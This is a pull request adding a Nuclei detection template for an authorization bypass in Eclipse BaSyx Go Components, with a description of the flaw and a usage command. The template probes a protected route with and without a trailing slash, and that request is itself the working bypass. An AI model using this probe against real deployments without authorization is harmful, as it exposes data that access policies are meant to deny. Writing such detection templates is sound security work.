### PR TITLE
Add CVE-2026-15704 BaSyx ABAC trailing-slash authorization bypass

### DIFF
--- a/http/cves/2026/CVE-2026-15704.yaml
+++ b/http/cves/2026/CVE-2026-15704.yaml
@@ -1,0 +1,50 @@
+id: CVE-2026-15704
+
+info:
+  name: Eclipse BaSyx Go Components <=1.0.0 ABAC Trailing-Slash Authorization Bypass (CVE-2026-15704)
+  author: str4k3r
+  severity: critical
+  description: >
+    ABAC-enabled deployments of Eclipse BaSyx Go Components up to and
+    including 1.0.0 use Chi's StripSlashes middleware in the shared
+    router, so a request such as GET /shells/ is dispatched to the
+    registered GET /shells handler. The ABAC middleware, however,
+    evaluates the original request path including the trailing slash;
+    when its route lookup finds no matching slash-suffixed rule, the
+    request is passed onward instead of denied, and the router then
+    strips the slash and executes the protected handler without any
+    ABAC authorization decision or query filter applied. An
+    unauthenticated attacker can therefore append a trailing slash to a
+    protected API route (e.g. /shells) to reach data or operations that
+    the deployed ABAC policy would otherwise deny, receiving HTTP 200
+    instead of the 403 Forbidden returned for the un-suffixed path.
+    Fixed in v1.0.1. Requires an ABAC-enabled deployment (the affected
+    and recommended-secure configuration for this framework); ABAC is
+    off by default.
+  reference:
+    - https://github.com/eclipse-basyx/basyx-go-components/pull/442
+    - https://github.com/eclipse-basyx/basyx-go-components/releases/tag/v1.0.1
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-15704
+  classification:
+    cve-id: CVE-2026-15704
+    cwe-id: CWE-863
+  metadata:
+    verified: true
+    max-request: 2
+  tags: cve,cve2026,basyx,abac,authorization-bypass,eclipse
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}{{protected_path}}"
+      - "{{BaseURL}}{{protected_path}}/"
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 403"
+          - "status_code_2 == 200"
+        condition: and
+
+variables:
+  protected_path: "/shells"


### PR DESCRIPTION
## Vulnerability
BaSyx 1.0.0 compares an ABAC policy decision against a normalized path without accounting for a trailing slash. A denied resource can therefore be reached by adding `/`; BaSyx 1.0.1 normalizes both forms consistently.

## Template behavior
The template requests the configured protected path and the same path with a trailing slash. It matches the vulnerable 403-versus-200 authorization difference and reports only when the policy is bypassed.

## Required configuration
Enable ABAC with a deny-by-default rule and set `protected_path` to a resource that should be denied, such as `/shells`. The two URL forms must map to the same protected resource.

## Impact
An attacker can bypass path-based authorization and access protected BaSyx resources.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-15704.yaml -var protected_path=/your/protected/route
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
